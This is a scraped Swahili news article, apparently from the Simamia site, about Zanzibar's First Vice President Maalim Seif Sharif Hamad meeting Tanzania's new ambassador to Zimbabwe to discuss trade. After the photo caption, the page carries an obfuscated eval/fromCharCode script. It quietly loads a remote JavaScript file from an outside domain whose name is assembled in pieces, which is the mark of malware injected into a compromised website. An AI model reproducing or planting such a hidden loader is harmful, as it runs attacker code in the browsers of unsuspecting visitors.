<p>Makamu wa Kwanza wa Rais wa Zanzibar, Maalim Seif Sharif Hamad</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
MAKAMU wa Kwanza wa Rais wa Zanzibar, Maalim Seif Sharif Hamad amesema wananchi wa Zimbabwe na Tanzania, wanayo nafasi kubwa ya kukuza maendeleo yao, iwapo fursa za kiuchumi nakibiashara zilizopo zitazidi kuibuliwa na kufanyiwa kazi.
Alisema hayo wakati alipofanya mazungumzo na Balozi mpya wa Tanzania nchini Zimbabwe, Charles Makakala alipofika afisini kwake Migombani kujitambulisha.
Maalim alisema nchi hizi mbili, zimekuwa na uhusiano wa muda mrefu wa kindugu zikiwa pia wanachama wa umoja wa maendeleo Kusini mwa Afrika (SADC) kwa hivyo malengo yao ya kiuchumi na kibiashara.
Alisema hivi sasa wapo Watanzania wengi wakiwemo kutoka Zanzibar, wanafanya biashara nchini Zimbabwe kama ilivyo kwa wafanya biashara wa Zimbabwe nchini.
Alisema wakati umefika kuwepo kwa mazingira mazuri ya kibiashara, ambayo yataleta tija kwa wananchi wa pande mbili hizo kwa ajili ya kukuza uchumi na maendeleo.
âUhusiano wa nchi mbili hizi unatakiwa kuimarishwa zaidi katika njanja za kibiashara na maendeleo,â alisema.
Balozi Makakala aliahidi kufanya kazi ya kidiplomasia ya kiuchumi, ambayo ndiyo sera ya Serikali ya Jamhuri ya Muungano wa Tanzania ambayo itawawezesha wananchi kufanya kazi za kibiashara na kukuza uchumi.
Balozi Makakala anachukua nafasi iliyoachwa wazi na Balozi Adadi Rajabu, ambaye amemaliza muda wake na sasa amerudi nyumbani na kuingia katika mchakato wa uchaguzi wa ubunge.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments